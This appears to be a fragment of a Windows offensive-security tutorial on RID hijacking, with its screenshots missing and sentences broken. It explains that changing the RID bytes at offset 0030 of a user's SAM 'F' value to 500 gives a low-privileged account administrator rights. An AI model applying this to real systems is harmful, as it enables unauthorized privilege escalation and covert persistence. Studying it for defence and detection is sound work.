NT SYSTEM
access to it.hijacked
is a low privileged user and has an RID of 1006 or 0x3ee:hijacked
, as expected, we get Access is Denied
:hijacked
that is used by LSASS during the user logon/authentication process. Specifically, at offset 0030
in the value F
there are bytes that denote user's RID, which in our case are 03ee (1006) for the user hijacked
:hijacked
assume administrator privileges:hijacked
RID from 3ee to 1f4 and creating a new logon session, we can see that the user hijacked
is now allowed to write to c:\windows\, suggesting it now has administrative privileges:hijacked
still does not belong to local administrators group, but its RID is now 500: